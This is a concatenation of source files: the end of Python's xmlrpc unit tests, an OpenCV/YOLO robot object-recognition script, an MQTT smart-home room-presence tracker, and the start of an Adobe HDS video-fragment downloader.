headers, {'X-Test': 'foo', 'X-Test-Second': 'bar'})
def test_header_empty(self):
p = xmlrpclib.ServerProxy(URL, headers=[])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {})
def test_header_tuple(self):
p = xmlrpclib.ServerProxy(URL, headers=(('X-Test', 'foo'),))
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_items(self):
p = xmlrpclib.ServerProxy(URL, headers={'X-Test': 'foo'}.items())
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
# Actual value of the URL doesn't matter if it is a string in
# the correct format.
self.url = 'http://fake.localhost'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(http.client.HTTPMessage):
def get(self, key, failobj=None):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return super().get(key, failobj)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
thread = threading.Thread(target=http_server, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
default_class = http.client.HTTPMessage
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = default_class
def test_basic(self):
# check that flag is false by default
flagval = xmlrpc.server.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("X-exception"), expected_err)
self.assertTrue(e.headers.get("X-traceback") is not None)
else:
self.fail('ProtocolError not raised')
@contextlib.contextmanager
def captured_stdout(encoding='utf-8'):
"""A variation on support.captured_stdout() which gives a text stream
having a `buffer` attribute.
"""
orig_stdout = sys.stdout
sys.stdout = io.TextIOWrapper(io.BytesIO(), encoding=encoding)
try:
yield sys.stdout
finally:
sys.stdout = orig_stdout
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = xmlrpc.server.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with captured_stdout(encoding=self.cgi.encoding) as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with support.EnvironmentVarGuard() as env, \
captured_stdout(encoding=self.cgi.encoding) as data_out, \
support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just
# need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method inorder to avoid all the datapassing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search(r'Content-Length: (\d+)', handle).group(1)),
len(content))
class UseBuiltinTypesTestCase(unittest.TestCase):
def test_use_builtin_types(self):
# SimpleXMLRPCDispatcher.__init__ accepts use_builtin_types, which
# makes all dispatch of binary data as bytes instances, and all
# dispatch of datetime argument as datetime.datetime instances.
self.log = []
expected_bytes = b"my dog has fleas"
expected_date = datetime.datetime(2008, 5, 26, 18, 25, 12)
marshaled = xmlrpclib.dumps((expected_bytes, expected_date), 'foobar')
def foobar(*args):
self.log.extend(args)
handler = xmlrpc.server.SimpleXMLRPCDispatcher(
allow_none=True, encoding=None, use_builtin_types=True)
handler.register_function(foobar)
handler._marshaled_dispatch(marshaled)
self.assertEqual(len(self.log), 2)
mybytes, mydate = self.log
self.assertEqual(self.log, [expected_bytes, expected_date])
self.assertIs(type(mydate), datetime.datetime)
self.assertIs(type(mybytes), bytes)
def test_cgihandler_has_use_builtin_types_flag(self):
handler = xmlrpc.server.CGIXMLRPCRequestHandler(use_builtin_types=True)
self.assertTrue(handler.use_builtin_types)
def test_xmlrpcserver_has_use_builtin_types_flag(self):
server = xmlrpc.server.SimpleXMLRPCServer(("localhost", 0),
use_builtin_types=True)
server.server_close()
self.assertTrue(server.use_builtin_types)
@support.reap_threads
def test_main():
support.run_unittest(XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, UseBuiltinTypesTestCase,
SimpleServerTestCase, SimpleServerEncodingTestCase,
KeepaliveServerTestCase1, KeepaliveServerTestCase2,
GzipServerTestCase, GzipUtilTestCase, HeadersServerTestCase,
MultiPathServerTestCase, ServerProxyTestCase, FailingServerTestCase,
CGIHandlerTestCase, SimpleXMLRPCDispatcherTestCase)
if __name__ == "__main__":
test_main()
|
ObjectRecognition.py | import numpy as np
import threading
import time
import nep
import time
import cv2
import sys
from PIL import Image
import sharo
show_image = 1
model = "yolo3-320"
try:
model = sys.argv[1]
print ("Model:" + model)
show_image = int(sys.argv[2])
print ("Show image: " + str(show_image))
except:
pass
path_models = "models/" #Path to models
# ------- Yolo parameters ------------
confThreshold = 0.5 #Confidence threshold
nmsThreshold = 0.4 #Non-maximum suppression threshold
# ------- TF parameters ------------
confThreshold = 0.5 #Confidence threshold
maskThreshold = 0.3 # Mask threshold
if model == "yolo3-320" or model == "yolo3-tiny":
inpWidth = 320 #Width of network's input image
inpHeight = 320 #Height of network's input image
classesFile = path_models + "coco.names"
elif model == "yolo3-416":
inpWidth = 416 #Width of network's input image
inpHeight = 416 #Height of network's input image
classesFile = path_models + "coco.names"
else:
inpWidth = 300 #Width of network's input image
inpHeight = 300 #Height of network's input image
classesFile = path_models + "coco_ms.names"
classes = None
with open(classesFile, 'rt') as f:
classes = f.read().rstrip('\n').split('\n')
print (classes)
# Lock primitive for securely accessing a shared variable
lock = threading.Lock()
# ---------- Nep -----------------
node = nep.node("object_recognition")
sub_img = node.new_sub("robot_image", "image") # Set the topic and the configuration
object_per = sharo.ObjectPerception(node, classes)
print("usb source")
pub_image = node.new_pub('robot_image_recognition','image')
myImage = cv2.imread("x.jpg") # Temporal image
def thread_function(name): # Get images as soon as possible
global myImage
while True:
s, img = sub_img.listen()
if s:
lock.acquire()
myImage = img.copy()
lock.release()
get_images = threading.Thread(target=thread_function, args=(1,))
get_images.start()
# pascal-voc-classes.txt
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
# BGR color
COLORS = (51,51,255)
def predict_detection(frame, net):
'''
Predict the objects present on the frame
'''
# Conversion to blob
blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), 127.5)
#blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), (127.5, 127.5, 127.5), False)
# omImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), 127.5)
# Detection and prediction with model
net.setInput(blob)
return net.forward()
# Remove the bounding boxes with low confidence using non-maxima suppression
def postprocess(frame, outs):
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
classIds = []
confidences = []
boxes = []
# Scan through all the bounding boxes output from the network and keep only the
# ones with high confidence scores. Assign the box's class label as the class with the highest score.
classIds = []
confidences = []
boxes = []
for out in outs:
for detection in out:
scores = detection[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIds.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
# Perform non maximum suppression to eliminate redundant overlapping boxes with
# lower confidences.
indices = cv2.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)
list_labels = []
list_index = []
for i in indices:
i = i[0]
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
drawPred(classIds[i], confidences[i], left, top, left + width, top + height, frame)
if confidences[i] > 0.5:
label = classes[classIds[i]]
position = [left + width/2, top + height/2]
list_index.append(classIds[i])
list_labels.append(label)
object_per.manage_objects(list_index)
#print(list_labels)
#print(list_index)
def getOutputsNames(net):
# Get the names of all the layers in the network
layersNames = net.getLayerNames()
# Get the names of the output layers, i.e. the layers with unconnected outputs
return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# Draw the predicted bounding box yolo
def drawPred(classId, conf, left, top, right, bottom, frame):
# Draw a bounding box.
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255))
label = '%.2f' % conf
# Get the label for the class name and its confidence
if classes:
assert(classId < len(classes))
label = '%s:%s' % (classes[classId], label)
#Display the label at the top of the bounding box
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv2.putText(frame, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255))
def draw_prediction(frame, detections, exploration_map, zone):
'''
Filters the predictions with a confidence threshold and draws these predictions
'''
(height, width) = frame.shape[:2]
for i in np.arange(0, detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > 0.5:
# Index of class label and bounding box are extracted
idx = int(detections[0, 0, i, 1])
box = detections[0, 0, i, 3:7] * np.array([width, height, width, height])
# Retreives corners of the bounding box
(startX, startY, endX, endY) = box.astype("int")
label = "{}: {:.2f}%".format(CLASSES[idx], confidence*100)
cv2.rectangle(frame, (startX, startY), (endX, endY),(255, 0, 0), 2)
labelPosition = endY - 5
cv2.putText(frame, label, (startX, labelPosition),
cv2.FONT_HERSHEY_DUPLEX, 0.4, (255, 255, 255), 1)
return frame
# Draw the predicted bounding box, colorize and show the mask on the image
def drawBox(frame, classId, conf, left, top, right, bottom, classMask):
# Draw a bounding box.
cv.rectangle(frame, (left, top), (right, bottom), (255, 178, 50), 3)
# Print a label of class.
label = '%.2f' % conf
if classes:
assert(classId < len(classes))
label = '%s:%s' % (classes[classId], label)
# Display the label at the top of the bounding box
labelSize, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255, 255, 255), cv.FILLED)
cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1)
# Resize the mask, threshold, color and apply it on the image
classMask = cv.resize(classMask, (right - left + 1, bottom - top + 1))
mask = (classMask > maskThreshold)
roi = frame[top:bottom+1, left:right+1][mask]
color = colors[classId%len(colors)]
# Comment the above line and uncomment the two lines below to generate different instance colors
#colorIndex = random.randint(0, len(colors)-1)
#color = colors[colorIndex]
frame[top:bottom+1, left:right+1][mask] = ([0.3*color[0], 0.3*color[1], 0.3*color[2]] + 0.7 * roi).astype(np.uint8)
# Draw the contours on the image
mask = mask.astype(np.uint8)
im2, contours, hierarchy = cv.findContours(mask,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)
cv.drawContours(frame[top:bottom+1, left:right+1], contours, -1, color, 3, cv.LINE_8, hierarchy, 100)
def load_training_set(filename):
'''
Load the data from a file and save them as a list
'''
training_set = []
f = open(filename, "r")
data = f.readlines()
index = 0
if f.mode == "r":
for line in data:
line = line.strip()
training_set.append(line.split(","))
# print((line.split(","))[-1])
f.close()
return training_set
exploration_map = [(0,0), (0,0), (0,0), (0,0), (0,0), (0,0), (0,0)]
zone = 1
n_frame = 0
# Set net and load model
print("[INFO] Loading model...")
if model == "ssd-mobilenet":
net = cv2.dnn.readNetFromCaffe(path_models + "MobileNetSSD_deploy.prototxt", path_models + "MobileNetSSD_deploy.caffemodel")
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-tiny":
modelConfiguration = path_models + "yolov3-tiny.cfg";
modelWeights = path_models + "yolov3-tiny.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-320" :
# Give the configuration and weight files for the model and load the network using them.
modelConfiguration = path_models + "yolov3.cfg";
modelWeights = path_models + "yolov3_320.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-tiny":
modelConfiguration = path_models + "yolov3-tiny.cfg";
modelWeights = path_models + "yolov3-tiny.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-416" :
# Give the configuration and weight files for the model and load the network using them.
modelConfiguration = path_models + "yolov3.cfg";
modelWeights = path_models + "yolov3_416.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "tensorflow":
net = cv2.dnn.readNetFromTensorflow(path_models + 'MobileNetSSDV2.pb', path_models + 'MobileNetSSDV2.pbtxt')
print("[INFO] Start adquisition...")
while True:
frame = myImage.copy()
cv2_im = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)
image = Image.fromarray(cv2_im)
if model == "ssd-mobilenet":
if (n_frame % 1) == 0:
# Runs the detection on a frame and return bounding boxes and predicted labels
detections = predict_detection(frame, net)
frame = draw_prediction(frame, detections, exploration_map, zone)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
#print(detections)
elif model == "tensorflow":
detections = []
rows, cols, channels = frame.shape
# Use the given image as input, which needs to be blob(s).
#blob = cv2.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False)
#blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), 127.5)
net.setInput(blob = cv2.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False))
out = net.forward()
for detection in out[0,0]:
classId = float(detection[1])
score = float(detection[2]) # == confidence
if score > 0.5:
try:
clase = str(classes[int(classId)])
score_str = str(score)
#print("Clase: " + clase + " " + str(int(classId)-1))
#print("Score: " + score_str)
left = detection[3] * cols
top = detection[4] * rows
right = detection[5] * cols
bottom = detection[6] * rows
#draw a red rectangle around detected objects
cv2.rectangle(frame, (int(left), int(top)), (int(right), int(bottom)), (0, 0, 255), thickness=2)
labelPosition = int(bottom) - 5
label = '%s:%s' % (clase, score_str)
cv2.putText(frame, label, (int(left), labelPosition),cv2.FONT_HERSHEY_DUPLEX, 0.4, (255, 255, 255), 1)
# Put efficiency information. The function getPerfProfile returns the
except:
pass
# overall time for inference(t) and the timings for each of the layers(in layersTimes)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
else:
# Create a 4D blob from a frame.
blob = cv2.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False)
# Sets the input to the network
net.setInput(blob)
# Runs the forward pass to get output of the output layers
outs = net.forward(getOutputsNames(net))
# Remove the bounding boxes with low confidence
postprocess(frame, outs)
# Put efficiency information. The function getPerfProfile returns the
# overall time for inference(t) and the timings for each of the layers(in layersTimes)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
pub_image.publish(frame)
if(show_image == 1):
cv2.imshow("Object recognition", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
break
n_frame += 1
|
main_new.py | import time
from datetime import datetime
import serial
import numpy as np
import math
import pdb
BED_ROOM = "bedroom"
LIVING_ROOM = "livingroom"
KITCHEN = "kitchen"
OUTSIDE = "exit"
TOILET = "toilet"
ROOMS = [LIVING_ROOM, BED_ROOM, OUTSIDE, TOILET, KITCHEN]
VALID_TRANSITIONS = {
BED_ROOM: [LIVING_ROOM, TOILET],
LIVING_ROOM: [BED_ROOM, KITCHEN, OUTSIDE, TOILET],
KITCHEN: [LIVING_ROOM],
OUTSIDE: [LIVING_ROOM],
TOILET: [LIVING_ROOM, BED_ROOM]
}
# used for connecting clients, subscribing and publishing to topics
BROKER = '192.168.0.102'
PORT = 1883
HOUSE_ID = "kjhouse"
DEVICE_TYPE = "NUC"
BPS_SENSOR = "bps"
MLX_SENSOR = "mlx"
from multiprocessing import Process, Manager
manager = Manager()
Global = manager.Namespace()
# to contain the status of all BPS in real time
binary_dict = manager.dict()
binary_dict = {
BED_ROOM: 0,
LIVING_ROOM: 0,
KITCHEN: 0,
OUTSIDE: 0,
TOILET: 0
}
# if the person has stayed in a particular room for more than the cutoff time for that room, a notification is sent to the MQTT
ROOM_CUTOFF_TIME_MINUTES = {
BED_ROOM: 60,
LIVING_ROOM: 60,
KITCHEN: 60,
OUTSIDE: 60,
TOILET: 60,
}
Global.last_visited = LIVING_ROOM
Global.last_entered_time = datetime.now()
def on_connect(client, userdata, flags, rc):
if rc == 0:
print ("Connection OK!")
else:
print("Bad connection, Returned Code: ", rc)
def on_disconnect(client, userdata, flags, rc=0):
print("Disconnected result code " + str(rc))
def on_message(client,userdata, msg):
try:
# print("while true - id(binary_dict): {0}".format(id(binary_dict)))
topic=msg.topic
device_type, house_id, current_room = topic.split("/")
m_decode=str(msg.payload.decode("utf-8","ignore"))
"""
print("-----")
print("topic: {0}; m_decode: {1}".format(topic, m_decode))
print("binary_dict: {0};".format(binary_dict))
print("Global.last_entered_time: {0}".format(Global.last_entered_time))
print("Global.last_visited: {0}".format(Global.last_visited))
"""
if m_decode == "0" or m_decode == "1":
binary_dict[current_room] = int(m_decode)
# if the person has moved rooms
if Global.last_visited != current_room and m_decode == "1":
if is_valid_transition(current_room):
print("nuc - person travels from {0} to {1}".format(Global.last_visited, current_room))
Global.last_entered_time = datetime.now()
Global.last_visited = current_room
# activate respective MLX sensors according to the room where the person is in
topic = "nuc/kjhouse"
client.publish(topic, Global.last_visited)
"""
for room in ROOMS:
topic = "/".join([MLX_SENSOR, HOUSE_ID, room])
if room == Global.last_visited:
client.publish(topic, "1")
else:
client.publish(topic, "0")
"""
except Exception as e:
print("ERROR: {0}".format(e))
pdb.set_trace()
def is_valid_transition(current_room):
return current_room in VALID_TRANSITIONS[Global.last_visited]
def mqtt_worker():
# to run as a separate process
import paho.mqtt.client as mqtt
# MQTT Setup
client = mqtt.Client()
# Attach MQTT Client callback functions
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = on_message
print("Connecting to broker...", BROKER)
client.connect(BROKER, PORT)
# Subscribe to topics for bps sensors
for room in ROOMS:
print("Subscribing to ", room)
print("/".join([BPS_SENSOR, HOUSE_ID, room]))
client.subscribe("/".join([BPS_SENSOR, HOUSE_ID, room]))
client.publish("/".join([DEVICE_TYPE, HOUSE_ID, room]), "Started NUC!")
client.loop_forever()
mqtt_worker_process = Process(target=mqtt_worker)
mqtt_worker_process.start()
while True:
try:
# print("binary_dict: {0}; Global.last_entered_time: {1}".format(binary_dict, Global.last_entered_time))
cutoff_duration_minutes = ROOM_CUTOFF_TIME_MINUTES[Global.last_visited]
current_duration = datetime.now()-Global.last_entered_time
# print("binary_dict: {0}; current_duration(seconds): {1}; cutoff_duration_minutes: {2}".format(binary_dict, current_duration, cutoff_duration_minutes))
if current_duration.total_seconds() >= cutoff_duration_minutes * 60:
print("PONG")
mqtt_worker_process.terminate()
exit(0)
except KeyboardInterrupt:
print("Interrupt received.")
mqtt_worker_process.terminate()
exit(0)
|
AdobeHDS.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# M6 version 0.1 par k3c
import binascii
import struct
import sys
import os
import base64
import math
import xml.etree.ElementTree
import xml.sax
import re
from urlparse import urlparse, urlunparse
import string
import unicodedata
import Queue
import threading, thread
import time
try:
import urllib3
from urllib3.exceptions import HTTPError
hasUrllib3 = True
except ImportError:
import urllib2
from urllib2 import HTTPError
hasUrllib3 = False
NumWorkerThreads = 7
class GetUrl(object):
def __init__(self, url, fragnum):
self.url = url
self.fragNum = fragnum
self.data = None
self.errCount = 0
QueueUrl = Queue.PriorityQueue()
QueueUrlDone = Queue.PriorityQueue()
M6Item = None
def workerRun():
global QueueUrl, QueueUrlDone, M6Item
while not QueueUrl.empty() and M6Item.status == 'DOWNLOADING':
item = QueueUrl.get()[1]
fragUrl = item.url
try:
item.data = M6Item.getFile(fragUrl)
QueueUrlDone.put((item.fragNum, item))
except HTTPError, e:
print( sys.exc_info())
if item.errCount > 3:
M6Item.status = 'STOPPED'
# raise
else:
item.errCount += 1
QueueUrl.put((item.fragNum, item))
print( e.code + " " + e.message)
QueueUrl.task_done()
# If we have exited the previous loop with error
while not QueueUrl.empty():
# print 'Ignore fragment', QueueUrl.get()[1].fragNum
QueueUrl.get()
def worker():
try:
workerRun()
except Exception, e:
print( sys.exc_info())
M6Item.status = 'STOPPED'
thread.interrupt_main()
def workerqdRun():
global QueueUrlDone, M6Item
currentFrag = 1
outFile = open(M6Item.localfilename, "wb")
M6Item.nbFragments= 19
while currentFrag <= M6Item.nbFragments and M6Item.status == 'DOWNLOADING':
item = QueueUrlDone.get()[1]
if currentFrag == item.fragNum:
# M6Item.verifyFragment(item.data)
if not M6Item.decodeFragment(item.fragNum, item.data):
raise Exception('decodeFrament')
M6Item.videoFragment(item.fragNum, item.data, outFile)
print( 'Fragment', currentFrag, 'OK')
currentFrag += 1
requeue = False
else:
print( 'Requeue', item.fragNum)
QueueUrlDone.put((item.fragNum, item))
requeue = True
QueueUrlDone.task_done()
if requeue:
time.sleep(1)
outFile.close()
# If we have exited the previous loop with error
if currentFrag > M6Item.nbFragments:
M6Item.status = 'COMPLETED'
else:
while not QueueUrlDone.empty():
print( 'Ignore fragment', QueueUrlDone.get()[1].fragNum)
def workerqd():
try:
workerqdRun()
except Exception, e:
print( str(sys.exc_info()))
M6Item.status = 'STOPPED'
thread.interrupt_main()
validFilenameChars = "-_.() %s%s" % (string.ascii_letters, string.digits)
def removeDisallowedFilenameChars(filename):
"Remove invalid filename characters"
filename = filename.decode('ASCII', 'ignore')
cleanedFilename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore')
cleanedFilename = cleanedFilename.replace(' ', '_')
return ''.join(c for c in cleanedFilename if c in validFilenameChars)
class M6(object):
def __init__(self, url, dest = '', proxy=None ):
self.status = 'INIT'
self.url = url
self.proxy = proxy
self.bitrate = 0
self.duration = 0
self.nbFragments = 0
self.tagHeaderLen = 11
self.prevTagSize = 4
urlp = urlparse(url)
fn = os.path.basename(urlp.path)
#self.localfilename = \
# os.path.join(dest, os.path.splitext(fn)[0]) + '.flv'
self.localfilename = dest
#self.localfilename = removeDisallowedFilenameChars(self.localfilename)
self.urlbootstrap = ''
self.bootstrapInfoId = ''
self.baseUrl = urlunparse((urlp.scheme, urlp.netloc,
os.path.dirname(urlp.path),
'', '', ''))
if hasUrllib3:
self.pm = urllib3.PoolManager(num_pools=100)
# self.pm = urllib3.connection_from_url(self.baseUrl)
self.manifest = self.getManifest(self.url)
self.parseManifest()
# self.pm = urllib3.connection_from_url(self.urlbootstrap)
def download(self):
global QueueUrl, QueueUrlDone, M6Item
M6Item = self
self.status = 'DOWNLOADING'
# self.outFile = open(self.localfilename, "wb")
self.nbFragments =19
for i in range(self.nbFragments):
fragUrl = self.urlbootstrap + 'Seg1-Frag'+str(i + 1)
QueueUrl.put((i + 1, GetUrl(fragUrl, i + 1)))
t = threading.Thread(target=workerqd)
# t.daemon = True
t.start()
for i in range(NumWorkerThreads):
t = threading.Thread(target=worker)
# t.daemon = True
t.start()
# QueueUrl.join()
# QueueUrlDone.join()
while self.status == 'DOWNLOADING':
try:
time.sleep(3)
except (KeyboardInterrupt, Exception), e:
print( sys.exc_info())
self.status = 'STOPPED'
# self.outFile.close()
if self.status != 'STOPPED':
self.status = 'COMPLETED'
def getInfos(self):
infos = {}
infos['status'] = self.status
infos['localfilename'] = self.localfilename
infos['proxy'] = self.proxy
infos['url'] = self.url
infos['bitrate'] = self.bitrate
infos['duration'] = self.duration
infos['nbFragments'] = self.nbFragments
infos['urlbootstrap'] = self.urlbootstrap
infos['baseUrl'] = self.baseUrl
#infos['drmId'] = self.drmAdditionalHeaderId
return infos
if hasUrllib3:
def getFile(self, url):
headers = urllib3.make_headers(
keep_alive=True,
user_agent='Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0',
accept_encoding=True)
r = self.pm.request('GET', url, headers=headers)
if r.status != 200:
print( 'Error downloading', r.status, url)
# sys.exit(1)
return r.data
else:
def getFile(self, url):
txheaders = {'User-Agent':
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0',
'Keep-Alive' : '600',
'Connection' : 'keep-alive'
}
request = urllib2.Request(url, None, txheaders)
response = urllib2.urlopen(request)
return response.read()
def getManifest(self, url):
self.status = 'GETTING MANIFEST'
return xml.etree.ElementTree.fromstring(self.getFile(url))
def parseManifest(self):
self.status = 'PARSING MANIFEST'
try:
root = self.manifest
# Duration
self.duration = float(root.find("{http://ns.adobe.com/f4m/1.0}duration").text)
# nombre de fragment
self.nbFragments = int(math.ceil(self.duration/3))
# streamid
self.streamid = root.findall("{http://ns.adobe.com/f4m/1.0}media")[-1]
# media
self.media = None
for media in root.findall('{http://ns.adobe.com/f4m/1.0}media'):
if int(media.attrib['bitrate']) > self.bitrate:
self.media = media
self.bitrate = int(media.attrib['bitrate'])
self.bootstrapInfoId = media.attrib['bootstrapInfoId']
#self.drmAdditionalHeaderId = media.attrib['drmAdditionalHeaderId']
self.flvHeader = base64.b64decode(media.find("{http://ns.adobe.com/f4m/1.0}metadata").text)
# Bootstrap URL
self.urlbootstrap = self.media.attrib["url"]
# urlbootstrap
self.urlbootstrap = self.baseUrl + "/" + self.urlbootstrap
except Exception, e:
print("Not possible to parse the manifest")
print( e)
sys.exit(-1)
def stop(self):
self.status = 'STOPPED'
def videoFragment(self, fragNum, data, fout):
start = M6Item.videostart(fragNum, data)
if fragNum == 1:
self.videoBootstrap(fout)
fout.write(data[start:])
def videoBootstrap(self, fout):
# Ajout de l'en-t?te FLV
# fout.write(binascii.a2b_hex("464c560105000000090000000012"))
# fout.write(binascii.a2b_hex("00018700000000000000"))
bootstrap = "464c560105000000090000000012"
bootstrap += "%06X" % (len(self.flvHeader),)
bootstrap += "%06X%08X" % (0, 0)
fout.write(binascii.a2b_hex(bootstrap))
# Ajout de l'header du fichier
fout.write(self.flvHeader)
